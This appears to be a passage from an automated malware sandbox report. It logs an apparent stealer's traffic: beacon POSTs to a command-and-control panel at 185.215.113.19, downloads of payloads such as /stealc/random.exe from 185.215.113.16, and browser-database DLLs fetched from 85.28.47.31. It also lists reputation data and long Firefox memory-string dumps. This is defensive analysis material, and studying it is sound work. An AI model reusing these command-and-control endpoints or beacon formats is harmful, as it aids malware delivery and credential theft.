Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 34.117.188.166 34.117.188.166
Source: Joe Sandbox View	IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View	IP Address: 185.215.113.19 185.215.113.19

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0031BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

7_2_0031BD60

Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive

Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://pubads.g.doubleclick.net/gampad/xml_vmap2*://pubads.g.doubleclick.net/gampad/xml_vmap1*://.adsafeprotected.com//unit/://.adsafeprotected.com/jsvid?*://.adsafeprotected.com/services/pub://trends.google.com/trends/embed://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etpexecuteIDB/promise</transaction.onerror equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php@mozilla.org/binaryoutputstream;1 equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.gstatic.com/firebasejs//firebase-messaging.js**://id.rambler.ru/rambler-id-helper/auth_events.jsTerminatoryTelemetry: Waiting to submit telemetry equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2624675381.00000238E7390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /www.youtube.com/accountMOZ_CRAx equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3353317296.00000286329B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000003.2579191427.000001CBE797F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2578648250.000001CBE796C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2581107426.000001CBE7980000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643663526.000001F414100000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2942352042.00000286233A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows? equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsmmoD equals www.youtube.com (Youtube)
